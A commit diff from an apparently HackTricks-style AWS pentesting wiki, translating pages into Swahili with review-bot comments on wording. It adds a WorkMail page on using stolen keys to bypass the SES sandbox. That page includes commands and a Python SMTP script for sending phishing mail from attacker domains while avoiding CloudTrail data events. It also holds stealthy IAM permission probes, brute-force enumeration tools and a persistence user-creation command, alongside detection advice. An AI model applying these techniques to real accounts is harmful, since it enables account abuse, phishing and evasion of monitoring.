Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws

This commit is contained in:
Translator
2026-02-12 12:51:44 +00:00
parent 68a1c8d60a
commit 58f74bcc61
3 changed files with 152 additions and 52 deletions

View File

@@ -4,7 +4,7 @@
## SES
Kwa taarifa zaidi angalia:
Kwa maelezo zaidi angalia:
{{#ref}}
../../aws-services/aws-ses-enum.md
@@ -25,15 +25,15 @@ Tuma barua pepe.
```bash
aws ses send-raw-email --raw-message file://message.json
```
Bado haijajaribiwa.
Bado inahitaji kujaribiwa.
### `ses:SendTemplatedEmail`
Tuma barua pepe kwa kutumia kiolezo.
Tuma barua pepe kwa kutumia templeti.
```bash
aws ses send-templated-email --source <value> --destination <value> --template <value>
```
Bado inahitaji kujaribiwa.
Bado haijajaribiwa.
### `ses:SendBulkTemplatedEmail`
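Review bot: the same English status line is rendered two different ways in this hunk, and in opposite directions: `Bado haijajaribiwa.` is turned into `Bado inahitaji kujaribiwa.` under `send-raw-email`, while `Bado inahitaji kujaribiwa.` is turned back into `Bado haijajaribiwa.` under `send-templated-email` (the same flip repeats in the `SendCustomVerificationEmail` hunk below). Likewise `kiolezo` becomes `templeti` here, but the later hunk keeps `kiolezo cha barua pepe`. Pick one rendering for "still needs to be tested" and one for "template" and apply it across the file.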
@@ -51,7 +51,7 @@ aws sesv2 send-bulk-email --default-content <value> --bulk-email-entries <value>
```
### `ses:SendBounce`
Tuma **bounce email** juu ya barua pepe uliopokea (ikionyesha kwamba barua pepe haikuweza kupokelewa). Hii inaweza kufanywa tu **hadi saa 24 baada ya kupokea** barua pepe.
Tuma **bounce email** kwa barua pepe uliopokelewa (ikionyesha kuwa barua pepe haikuweza kupokelewa). Hii inaweza kufanywa tu **hadi 24h baada ya kupokea** barua pepe.
```bash
aws ses send-bounce --original-message-id <value> --bounce-sender <value> --bounced-recipient-info-list <value>
```
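Review bot: noun-class agreement is broken in the replacement sentence: `barua pepe uliopokelewa` mixes the u- subject prefix with a passive verb. `barua pepe` takes the i- prefix, so it should read `barua pepe iliyopokelewa` (or keep the active `uliyopokea`, "that you received"). Otherwise this hunk is a wording change only.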
@@ -59,11 +59,23 @@ Bado haijajaribiwa.
### `ses:SendCustomVerificationEmail`
Hii itatuma barua pepe ya uthibitisho iliyobinafsishwa. Huenda ukahitaji ruhusa pia za kuunda barua pepe ya kiolezo.
Hii itatuma barua pepe ya uthibitisho iliyobinafsishwa. Huenda uhitaji ruhusa pia kuunda kiolezo cha barua pepe.
```bash
aws ses send-custom-verification-email --email-address <value> --template-name <value>
aws sesv2 send-custom-verification-email --email-address <value> --template-name <value>
```
Bado haijajaribiwa.
Bado inahitaji kujaribiwa.
## WorkMail pivot to bypass SES sandbox
Wakati `ses:GetAccount` inaonyesha akaunti bado iko katika SES sandbox na `ses:ListIdentities` inarudisha hakuna watuma waliothibitishwa, washambuliaji wanaweza **pivot to WorkMail** kutuma mara moja (hakuna sandbox na quotas za default zilizo juu) kwa kuunda orgs, kuthibitisha domains, na kusajili mailboxes.
{{#ref}}
../aws-workmail-post-exploitation/README.md
{{#endref}}
## References
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
{{#include ../../../../banners/hacktricks-training.md}}
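Review bot: this is a translation commit, yet the second command in the `SendCustomVerificationEmail` block changes from `aws ses send-custom-verification-email` to `aws sesv2 send-custom-verification-email`. Both CLI namespaces expose that subcommand, so the line is not wrong, but a translation should not silently switch the invocation away from the English source page. In the new WorkMail paragraph, `ses:ListIdentities inarudisha hakuna watuma waliothibitishwa` overstates what `ListIdentities` returns: it lists every identity regardless of verification state, so the verified/unverified distinction comes from `aws ses get-identity-verification-attributes` (or `aws sesv2 get-email-identity`); an empty list is the stronger signal and the sentence should say so. The `{{#ref}}`/`{{#endref}}` block and the new References section follow the page's existing conventions.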

View File

@@ -0,0 +1,76 @@
# AWS - WorkMail Post Exploitation
{{#include ../../../../banners/hacktricks-training.md}}
## Abusing WorkMail to bypass SES sandbox
Even if SES is stuck in the **sandbox** (verified-recipient only, ~200 msgs/24h, 1 msg/s), WorkMail haina vikwazo vinavyofanana. Mshambuliaji mwenye long-term keys anaweza kuanzisha miundombinu ya barua ya muda na kuanza kutuma mara moja:
1. **Create a WorkMail org (region-scoped)**
```bash
aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
```
2. **Verify attacker-controlled domains** (WorkMail invokes SES APIs as `workmail.amazonaws.com`):
```bash
aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com
```
3. **Provision mailbox users** and register them:
```bash
aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
```
Notes:
- Default **recipient cap** documented by AWS: **100,000 external recipients/day per org** (aggregated across users).
- Domain verification activity itaonekana katika CloudTrail chini ya SES lakini na **`invokedBy`: `workmail.<region>.amazonaws.com`**, hivyo matukio ya uthibitisho ya SES yanaweza kuwa yanahusiana na usanidi wa WorkMail badala ya kampeni za SES.
- Watumiaji wa sanduku la WorkMail wanakuwa sehemu ya **application-layer persistence** huru kutoka kwa IAM users.
## Sending paths & telemetry gaps
### Web client (WorkMail UI)
- Inarekodiwa kama matukio ya **`ses:SendRawEmail`** katika CloudTrail.
- `userIdentity.type` = `AWSService`, `invokedBy/sourceIPAddress/userAgent` = `workmail.<region>.amazonaws.com`, kwa hivyo **true client IP imefichwa**.
- `requestParameters` bado leak sender (`source`, `fromArn`, `sourceArn`, configuration set) ili kuunganisha na domain/sanduku la barua zilizothibitishwa hivi karibuni.
### SMTP (stealthiest)
- Endpoint: `smtp.mail.<region>.awsapps.com:465` (SMTP over SSL) kwa kutumia password ya sanduku la barua.
- **No CloudTrail data events** zinazozalishwa kwa ajili ya SMTP delivery, hata pale SES data events zikiwa zimewezeshwa.
- Pointi za utambuzi muhimu ni provisioning ya org/domain/user na SES identity ARNs zinazotajwa katika matukio ya `SendRawEmail` yaliyotumwa kupitia web baadaye.
<details>
<summary>Example SMTP send via WorkMail</summary>
```python
import smtplib
from email.message import EmailMessage
SMTP_SERVER = "smtp.mail.us-east-1.awsapps.com"
SMTP_PORT = 465
EMAIL_ADDRESS = "marketing@attacker-domain.com"
EMAIL_PASSWORD = "SuperSecretPassword!"
target = "victim@example.com" # can be unverified/external
msg = EmailMessage()
msg["Subject"] = "WorkMail SMTP"
msg["From"] = EMAIL_ADDRESS
msg["To"] = target
msg.set_content("Delivered via WorkMail SMTP")
with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
smtp.send_message(msg)
```
</details>
## Mambo ya kugundua
- Ikiwa WorkMail haifai, zuia kwa kutumia **SCPs** (`workmail:*` deny) katika ngazi ya shirika.
- Weka tahadhari wakati wa provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, na uthibitisho wa SES na `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Angalia matukio yasiyo ya kawaida ya **`ses:SendRawEmail`** ambapo identity ARNs zinarejelea domains mpya na IP/UA ya chanzo ni sawa na `workmail.<region>.amazonaws.com`.
## Marejeo
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)
{{#include ../../../../banners/hacktricks-training.md}}
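Review bot: step 2 runs `aws ses verify-domain-identity` and `aws ses verify-domain-dkim` directly with the attacker's credentials, but the note after it and the detection section assume the SES verification events carry `invokedBy` = WorkMail. That attribution only appears when the domain is added through WorkMail itself (for example `aws workmail register-mail-domain --organization-id <org-id> --domain-name attacker-domain.com`); a direct `ses verify-domain-identity` call is logged under the calling IAM principal with no WorkMail marker. Either show the WorkMail-side command in step 2 or reword the detection bullets. Two smaller gaps: the SMTP example logs in with a mailbox password, but step 3 never sets one (`create-user` accepts `--password`, and `aws workmail reset-password --organization-id <org-id> --user-id <user-id> --password <pw>` sets it afterwards); and the service principal is written as `workmail.<region>.amazonaws.com` in the telemetry section but `workmail.amazonaws.com` in the detection bullet, so pick one form. The prose also switches language mid-sentence (`Even if SES is stuck in the **sandbox** ... WorkMail haina vikwazo vinavyofanana`), which a translation commit should settle one way.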

View File

@@ -1,18 +1,18 @@
# AWS - IAM, Kituo cha Utambulisho & SSO Enum
# AWS - IAM, Identity Center & SSO Uorodheshaji
{{#include ../../../banners/hacktricks-training.md}}
## IAM
You can find a **description of IAM** in:
Unaweza kupata **maelezo ya IAM** katika:
{{#ref}}
../aws-basic-information/
{{#endref}}
### Enumeration
### Uorodheshaji
Main permissions needed:
Ruhusa kuu zinazohitajika:
- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion`
- `iam:ListRoles`
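Review bot: the new title `# AWS - IAM, Identity Center & SSO Uorodheshaji` translates only the last word, leaving `Identity Center` and `SSO` in English while `Enumeration` becomes `Uorodheshaji`; later hunks in this same file move section headings back from Swahili to English (`### Unauthenticated Access`, `### Privilege Escalation`), so the file ends up with no consistent heading language. Decide whether headings are translated or kept in English and apply it throughout.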
@@ -88,37 +88,49 @@ aws iam get-account-password-policy
aws iam list-mfa-devices
aws iam list-virtual-mfa-devices
```
### Uthibitisho wa ruhusa kwa siri kupitia kushindwa kwa makusudi
Wakati `List*` au simulator APIs zimezimwa, unaweza **kuhakiki ruhusa za mabadiliko bila kuunda rasilimali za kudumu** kwa kulazimisha makosa ya uthibitishaji yanayoweza kutabirika. AWS bado huangalia IAM kabla ya kurudisha makosa haya, kwa hivyo kuona kosa kunathibitisha mwito ana haki ya kutekeleza kitendo hicho:
```bash
# Confirm iam:CreateUser without creating a new principal (fails only after authz)
aws iam create-user --user-name <existing_user> # -> EntityAlreadyExistsException
# Confirm iam:CreateLoginProfile while learning password policy requirements
aws iam create-login-profile --user-name <target_user> --password lower --password-reset-required # -> PasswordPolicyViolationException
```
Majaribio haya bado huunda matukio ya CloudTrail (na `errorCode` imewekwa) lakini huzuia kuacha artifacts mpya za IAM, na huwafanya kuwa muhimu kwa **uthibitishaji wa ruhusa kwa kelele ndogo** wakati wa interactive recon.
### Permissions Brute Force
Ikiwa unavutiwa na ruhusa zako lakini huna ufikiaji wa kuuliza IAM unaweza kila wakati kuzilazimisha.
Ikiwa ungependa kujua ruhusa zako mwenyewe lakini huna ufikiaji wa kuhoji IAM, unaweza kila wakati kuzifanyia brute-force.
#### bf-aws-permissions
Chombo [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) ni script ya bash tu ambayo itakimbia ikitumia profaili iliyoonyeshwa **`list*`, `describe*`, `get*`** vitendo vyote inavyoweza kupata kwa kutumia ujumbe wa msaada wa `aws` cli na **kurudisha utekelezaji uliofanikiwa**.
Zana [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) ni tu bash script ambayo itaendesha ikitumia profile iliyotajwa zote hatua za **`list*`, `describe*`, `get*`** zinazoweza kupatikana kwa kutumia ujumbe wa msaada wa aws cli na **kurudisha utekelezaji uliofanikiwa**.
```bash
# Bruteforce permissions
bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt
```
#### bf-aws-perms-simulate
Chombo [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) kinaweza kupata ruhusa zako za sasa (au za wakuu wengine) ikiwa una ruhusa **`iam:SimulatePrincipalPolicy`**
Chombo [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) kinaweza gundua ruhusa zako za sasa (au za principals wengine) ikiwa una ruhusa **`iam:SimulatePrincipalPolicy`**
```bash
# Ask for permissions
python3 aws_permissions_checker.py --profile <AWS_PROFILE> [--arn <USER_ARN>]
```
#### Perms2ManagedPolicies
Ikiwa umepata **idhini fulani ambazo mtumiaji wako ana**, na unafikiri kwamba zinatolewa na **jukumu la AWS lililosimamiwa** (na si la kawaida). Unaweza kutumia chombo [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) kuangalia yote **majukumu ya AWS yaliyosimamiwa yanayotoa idhini ulizogundua kwamba una**.
Kama umepata **idhini fulani ambazo mtumiaji wako ana**, na ukidhani zinatolewa na **managed AWS role** (na si ile ya custom). Unaweza kutumia zana [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) ili kukagua zote **AWS managed roles that grants the permissions you discovered that you have**.
```bash
# Run example with my profile
python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt
```
> [!WARNING]
> Inawezekana "kujua" kama ruhusa ulizonazo zimetolewa na jukumu linalosimamiwa na AWS ikiwa unaona kwamba **una ruhusa juu ya huduma ambazo hazitumiki** kwa mfano.
> Inawezekana "kujua" ikiwa ruhusa ulizo nazo zimetolewa na role inayosimamiwa na AWS ikiwa utaona, kwa mfano, kwamba **una ruhusa kwa huduma ambazo hazitumiki**.
#### Cloudtrail2IAM
[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) ni zana ya Python inayochambua **maktaba za AWS CloudTrail ili kutoa na kufupisha vitendo** vilivyofanywa na kila mtu au mtumiaji au jukumu maalum tu. Zana hiyo it **ichambue kila maktaba ya cloudtrail kutoka kwenye bucket iliyoashiriwa**.
[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) ni zana ya Python inayochambua **AWS CloudTrail logs ili kutoa na kufupisha vitendo** vilivyofanywa na kila mtu au mtumiaji au role maalum. Zana hiyo itapitia kila cloudtrail log kutoka kwa bucket iliyotajwa.
```bash
git clone https://github.com/carlospolop/Cloudtrail2IAM
cd Cloudtrail2IAM
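Review bot: the new "deliberate failure" section needs a caveat on the second probe. `create-login-profile ... --password lower` only fails safely because `lower` is five characters, below even the smallest configurable minimum length (6) in an IAM password policy; the text should state that the test password must be chosen to violate the policy, because a longer value that happens to satisfy it would succeed and create a real login profile on a user that had none, which is exactly the artifact the section says it avoids. It should also note that the probe confirms `iam:CreateLoginProfile` only for that specific user ARN. The first probe is sound: IAM authorizes before the `EntityAlreadyExists` check, so the error does prove the permission. Separately, the word for "tool" is inconsistent within the hunk: `Chombo` becomes `Zana` for bf-aws-permissions but stays `Chombo` for bf-aws-perms-simulate.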
@@ -126,16 +138,16 @@ pip install -r requirements.txt
python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS]
```
> [!WARNING]
> Ikiwa unapata .tfstate (faili za hali za Terraform) au faili za CloudFormation (hizi kwa kawaida ni faili za yaml zilizoko ndani ya bucket yenye prefix cf-templates), unaweza pia kuvisoma ili kupata usanidi wa aws na kujua ni ruhusa zipi zimepewa nani.
> Ikiwa utapata .tfstate (Terraform state files) au CloudFormation files (hizi kawaida ni yaml files zilizopo ndani ya bucket yenye prefix cf-templates), unaweza pia kuvisoma ili kupata mipangilio ya aws na kuona ni ruhusa gani zimepewa nani.
#### enumerate-iam
Ili kutumia chombo [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) kwanza unahitaji kupakua mwisho wote wa API AWS, kutoka kwa hizo skripti **`generate_bruteforce_tests.py`** itapata **"list\_", "describe\_", na "get\_" endpoints.** Na hatimaye, itajaribu **kuzipata** kwa kutumia akreditif zilizotolewa na **kuonyesha kama ilifanya kazi**.
To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) kwanza unahitaji kupakua endpoints zote za API za AWS; kutoka kwa hizo script **`generate_bruteforce_tests.py`** itapata endpoints zote za **"list\_", "describe\_", and "get\_" endpoints.** Na hatimaye, itajaribu **kuwafikia** kwa credentials zilizotolewa na **kuonyesha kama ilifanya kazi**.
(Katika uzoefu wangu **chombo kinakwama katika hatua fulani**, [**angalia suluhisho hili**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) kujaribu kutatua hilo).
(Kwa uzoefu wangu **tool inakamatika sehemu fulani**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) ili kujaribu kurekebisha hilo).
> [!WARNING]
> Katika uzoefu wangu chombo hiki ni kama kile cha awali lakini kinafanya kazi vibaya zaidi na kinachunguza ruhusa chache zaidi.
> Kwa uzoefu wangu tool hii ni kama ile ya awali lakini inafanya kazi vibaya zaidi na inakagua ruhusa chache
```bash
# Install tool
git clone git@github.com:andresriancho/enumerate-iam.git
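Review bot: the replacement paragraph starts in English (`To use the tool [...] kwanza unahitaji kupakua`) and then continues in Swahili, and the same mixing appears in `[**checkout this fix**]` and `inakamatika`; in a translation commit these sentences should be in one language. The first-person remark about the tool hanging is the author's and should only be translated, not reworded.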
@@ -154,7 +166,7 @@ python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--sess
```
#### weirdAAL
Unaweza pia kutumia chombo [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). Chombo hiki kitakagua **operesheni kadhaa za kawaida kwenye huduma kadhaa za kawaida** (kitakagua baadhi ya ruhusa za kuorodhesha na pia baadhi ya ruhusa za privesc). Lakini kitakagua tu ukaguzi ulioandikwa (njia pekee ya kukagua vitu zaidi ni kuandika majaribio zaidi).
Unaweza pia kutumia zana [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). Zana hii itakagua **operesheni kadhaa za kawaida kwenye huduma kadhaa za kawaida** (itatathmini baadhi ya enumeration permissions na pia baadhi ya privesc permissions). Lakini itakagua tu coded checks (njia pekee ya kukagua vitu zaidi ni kuandika tests zaidi).
```bash
# Install
git clone https://github.com/carnal0wnage/weirdAAL.git
@@ -178,7 +190,7 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions
# [+] elbv2 Actions allowed are [+]
# ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups']
```
#### Zana za Kuimarisha BF ruhusa
#### Vifaa vya Hardening kwa ruhusa za BF
{{#tabs }}
{{#tab name="CloudSploit" }}
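Review bot: `#### Vifaa vya Hardening kwa ruhusa za BF` is a step backwards from the previous `#### Zana za Kuimarisha BF ruhusa`: `vifaa` means equipment or devices rather than software tools, and `Hardening` is left untranslated although the old heading already rendered it as `Kuimarisha`. Suggest `#### Zana za kuimarisha ruhusa za BF`, or keep the heading entirely in English if that is the convention chosen for the rest of the file.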
@@ -208,43 +220,43 @@ steampipe dashboard
#### \<YourTool>
Hakuna kati ya zana zilizopita zinazoweza kuangalia karibu na ruhusa zote, hivyo ikiwa unajua zana bora zaidi tuma PR!
Hakuna kati ya zana zilizotajwa hapo awali inayoweza kuangalia karibu ruhusa zote, hivyo ikiwa unajua zana bora, tuma PR!
### Ufikiaji Usio na Uthibitisho
### Unauthenticated Access
{{#ref}}
../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum/README.md
{{#endref}}
### Kuinua Haki
### Privilege Escalation
Katika ukurasa ufuatao unaweza kuangalia jinsi ya **kutumia ruhusa za IAM ili kuinua haki**:
Kwenye ukurasa unaofuata unaweza kuona jinsi ya **abuse IAM permissions to escalate privileges**:
{{#ref}}
../aws-privilege-escalation/aws-iam-privesc/README.md
{{#endref}}
### IAM Baada ya Kutekeleza
### IAM Post Exploitation
{{#ref}}
../aws-post-exploitation/aws-iam-post-exploitation/README.md
{{#endref}}
### IAM Kudumu
### IAM Persistence
{{#ref}}
../aws-persistence/aws-iam-persistence/README.md
{{#endref}}
## Kituo cha Utambulisho wa IAM
## IAM Identity Center
Unaweza kupata **maelezo ya Kituo cha Utambulisho wa IAM** katika:
Unaweza kupata **description of IAM Identity Center** katika:
{{#ref}}
../aws-basic-information/
{{#endref}}
### Unganisha kupitia SSO na CLI
### Connect via SSO with CLI
```bash
# Connect with sso via CLI aws configure sso
aws configure sso
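Review bot: every heading in this hunk is moved from Swahili back to English (`### Ufikiaji Usio na Uthibitisho` to `### Unauthenticated Access`, `### Kuinua Haki` to `### Privilege Escalation`, `## Kituo cha Utambulisho wa IAM` to `## IAM Identity Center`), while the top of the file and the enumeration hunks translate headings into Swahili (`### Uorodheshaji`). The body text goes the other way: `Unaweza kupata **description of IAM Identity Center** katika:` leaves only the bold phrase in English. Apply one rule, either all headings in English with translated body text, or all headings translated.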
@@ -255,18 +267,18 @@ sso_account_id = <account_numbre>
sso_role_name = AdministratorAccess
sso_region = us-east-1
```
### Enumeration
### Uorodheshaji
Vipengele vikuu vya Kituo cha Utambulisho ni:
Mambo kuu ya Identity Center ni:
- Watumiaji na vikundi
- Seti za Ruhusa: Zina sera zilizounganishwa
- Akaunti za AWS
- Permission Sets: Zina policies zimeambatishwa
- AWS Accounts
Kisha, uhusiano huundwa ili watumiaji/vikundi wawe na Seti za Ruhusa juu ya Akaunti ya AWS.
Kisha, uhusiano huundwa ili watumiaji/vikundi wawe na Permission Sets kwa AWS Account.
> [!NOTE]
> Kumbuka kwamba kuna njia 3 za kuunganisha sera kwenye Seti ya Ruhusa. Kuunganisha sera zinazodhibitiwa na AWS, sera zinazodhibitiwa na Wateja (sera hizi zinahitaji kuundwa katika akaunti zote ambazo Seti za Ruhusa zinahusisha), na sera za ndani (zilizofafanuliwa hapo).
> Kumbuka kwamba kuna njia 3 za kuambatisha policies kwa Permission Set. Kuambatisha AWS managed policies, Customer managed policies (policies hizi zinahitaji kuundwa katika akaunti zote ambazo Permission Set inaathiri), na inline policies (zilizoelezwa ndani yake).
```bash
# Check if IAM Identity Center is used
aws sso-admin list-instances
@@ -300,9 +312,9 @@ aws identitystore list-group-memberships --identity-store-id <store-id> --group-
## Get memberships or a user or a group
aws identitystore list-group-memberships-for-member --identity-store-id <store-id> --member-id <member-id>
```
### Local Enumeration
### Uorodheshaji wa Kijijini
Inawezekana kuunda ndani ya folda `$HOME/.aws` faili la config ili kuunda miprofaili inayopatikana kupitia SSO, kwa mfano:
Inawezekana kuunda ndani ya folda `$HOME/.aws` faili config ili kusanidi profaili zinazopatikana kupitia SSO, kwa mfano:
```ini
[default]
region = us-west-2
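Review bot: `### Uorodheshaji wa Kijijini` mistranslates `Local Enumeration`: `kijijini` means "in the village" or rural, whereas the section is about what is on the local machine (`$HOME/.aws`). `### Uorodheshaji wa Ndani` carries the intended meaning, or leave `Local Enumeration` in English as the other reverted headings do. The rest of the hunk (`miprofaili` to `profaili`) reads fine.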
@@ -320,16 +332,16 @@ output = json
role_arn = arn:aws:iam::<acc-id>:role/ReadOnlyRole
source_profile = Hacktricks-Admin
```
Mkonfigu huu unaweza kutumika na amri:
Usanidi huu unaweza kutumika na amri zifuatazo:
```bash
# Login in ms-sso-profile
aws sso login --profile my-sso-profile
# Use dependent-profile
aws s3 ls --profile dependent-profile
```
Wakati **profaili kutoka SSO inatumika** kupata taarifa fulani, akidi zina **hifadhiwa** katika faili ndani ya folda **`$HOME/.aws/sso/cache`**. Hivyo basi zinaweza **kusomwa na kutumika kutoka hapo**.
Wakati **profile kutoka SSO inapotumika** kupata baadhi ya taarifa, nyaraka za uthibitisho **zimehifadhiwa** katika faili ndani ya folda **`$HOME/.aws/sso/cache`**. Kwa hivyo zinaweza **kusomwa na kutumika kutoka huko**.
Zaidi ya hayo, **akidi zaidi** zinaweza kuhifadhiwa katika folda **`$HOME/.aws/cli/cache`**. Hii folda ya cache inatumika hasa unapokuwa **ukifanya kazi na AWS CLI profiles** zinazotumia akidi za mtumiaji wa IAM au **kuchukua** majukumu kupitia IAM (bila SSO). Mfano wa usanidi:
Zaidi ya hayo, **nyaraka zaidi za uthibitisho** zinaweza kuhifadhiwa katika folda **`$HOME/.aws/cli/cache`**. Mfolda hii ya cache inatumiwa hasa unapokuwa **unafanya kazi na AWS CLI profiles** zinazotumia nyaraka za watumiaji wa IAM au **assume** roles kupitia IAM (bila SSO). Mfano wa config:
```ini
[profile crossaccountrole]
role_arn = arn:aws:iam::234567890123:role/SomeRole
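Review bot: `Mfolda hii ya cache` is not a standard form; `folda` takes `hii`, so `Folda hii ya cache` (the preceding paragraph already uses `folda`). Credentials are rendered as `nyaraka za uthibitisho` here but as `akidi` in the lines being replaced; choose one term for the page. In the unchanged command block the comment `# Login in ms-sso-profile` does not match the profile actually used, `--profile my-sso-profile`; worth fixing while this text is being touched.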
@@ -337,36 +349,36 @@ source_profile = default
mfa_serial = arn:aws:iam::123456789012:mfa/saanvi
external_id = 123456
```
### Upatikanaji Usioidhinishwa
### Unauthenticated Access
{{#ref}}
../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum/README.md
{{#endref}}
### Kuinua Mamlaka
### Privilege Escalation
{{#ref}}
../aws-privilege-escalation/aws-sso-and-identitystore-privesc/README.md
{{#endref}}
### Baada ya Kutekeleza
### Post Exploitation
{{#ref}}
../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation/README.md
{{#endref}}
### Kudumu
### Persistence
#### Unda mtumiaji na uweke ruhusa kwake
#### Unda mtumiaji na umpe ruhusa
```bash
# Create user identitystore:CreateUser
aws identitystore create-user --identity-store-id <store-id> --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc
## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password
```
- Unda kundi na uweke ruhusa na kuweka mtumiaji anayedhibitiwa
- Toa ruhusa za ziada kwa mtumiaji au kundi lililodhibitiwa
- Kwa kawaida, ni watumiaji pekee wenye ruhusa kutoka Akaunti ya Usimamizi watakaoweza kufikia na kudhibiti Kituo cha Utambulisho wa IAM.
- Unda kikundi, umpe ruhusa, na umweke mtumiaji udhibitiwa ndani yake
- Mpa ruhusa za ziada mtumiaji udhibitiwa au kikundi
- Kwa chaguo-msingi, watumiaji pekee wenye ruhusa kutoka Management Account ndio watakaoweza kufikia na kudhibiti IAM Identity Center.
Hata hivyo, inawezekana kupitia Msimamizi wa Delegated kuruhusu watumiaji kutoka akaunti tofauti kuisimamia. Hawa hawataweza kuwa na ruhusa sawa, lakini wataweza kufanya [**shughuli za usimamizi**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
Hata hivyo, inawezekana kupitia Delegate Administrator kuruhusu watumiaji kutoka account tofauti kusimamia. Hawatakuwa na ruhusa sawa kabisa, lakini wataweza kutekeleza [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html).
{{#include ../../../banners/hacktricks-training.md}}
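Review bot: `umweke mtumiaji udhibitiwa ndani yake` and `mtumiaji udhibitiwa au kikundi` drop the relative marker that the replaced text had (`anayedhibitiwa`, "who is controlled"); `udhibitiwa` on its own is not a valid form, so use `mtumiaji anayedhibitiwa` or `mtumiaji unayemdhibiti` ("that you control"). Also `Delegate Administrator` should be `Delegated Administrator`, the term AWS uses on the linked `delegated-admin.html` page.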